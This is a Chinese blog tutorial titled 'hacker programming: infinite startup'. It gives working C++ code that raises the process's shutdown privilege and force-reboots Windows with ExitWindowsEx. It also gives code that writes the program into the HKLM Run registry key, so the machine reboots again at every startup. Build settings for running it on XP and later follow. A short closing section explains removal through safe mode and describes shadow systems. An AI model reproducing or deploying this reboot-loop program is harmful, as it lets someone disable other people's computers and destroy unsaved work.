首页 > 代码库 > 2016.9.15 黑客编程之无限启动

2016.9.15 黑客编程之无限启动

1.涉及的编程工具是:VS2013;可以在windows环境下,编写web,JavaScript,C++,C等等程序;

 

2.第一个需要掌握的函数是:ExitWindowsEx(EWX_REBOOT, 0);该函数用来重启,关闭,注销电脑;

3.使用该函数必须先,包含windows的API:

#include <windows.h>

 

4.权限问题,代码解决:

BOOL MySystemShutdown()
{
HANDLE hToken;
TOKEN_PRIVILEGES tkp;

// Get a token for this process.

if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
return(FALSE);

// Get the LUID for the shutdown privilege.

LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,
&tkp.Privileges[0].Luid);

tkp.PrivilegeCount = 1; // one privilege to set
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

// Get the shutdown privilege for this process.

AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,
(PTOKEN_PRIVILEGES)NULL, 0);

if (GetLastError() != ERROR_SUCCESS)
return FALSE;

// Shut down the system and force all applications to close.

if (!ExitWindowsEx(EWX_REBOOT | EWX_FORCE,                       //ExitWindowsEx是系统提供的API,要使用它,必须先提权;
SHTDN_REASON_MAJOR_OPERATINGSYSTEM |
SHTDN_REASON_MINOR_UPGRADE |
SHTDN_REASON_FLAG_PLANNED))
return FALSE;

//shutdown was successful
return TRUE;
}

 

3.VS2013中的项目设置:

(1)项目->属性->常规->平台工具集,选择XP;这样可以使得程序在XP及其以上的系统中,运作;

(2)项目->属性->C++->代码生成->运行库->选择多线程(/MT)

 

4.用代码来更改注册表的设置,注册表其实就是windows的配置文件:

HKEY hKey = { 0 };                                                            //初始化,承载注册表,代表注册表修改位置的句柄
RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE,&hKey);   //注册表的路径,必须是“//”
                                                                                                         
char sz_path_c[MAXBYTE] = { 0 };                                 

GetModuleFileNameA(nullptr,sz_path_c,MAXBYTE);
RegSetValueExA(hKey, "shutDownDeno", 0, REG_SZ, (BYTE*)sz_path_c, strlen(sz_path_c));                        //写入注册表的函数

 

5.系统开机启动,有不下5个地方可以写入;破解方法:

(1)开机按F8:进入安全模式。在安全模式下:

删除注册表的选项;

(2)安全模式下:删除这个软件;

 

6.影子系统

影子系统 ,是隔离保护Windows操作系统,同时创建一个和真实操作系统一模一样的虚拟化影像系统。进入影子系统后,所有操作都是虚拟的,所有的病毒和流氓软件都无法感染真正的操作系统。系统出现问题了,或者上网产生垃圾文件,只需轻松的重启电脑,一切又恢复最佳状态。

 

2016.9.15 黑客编程之无限启动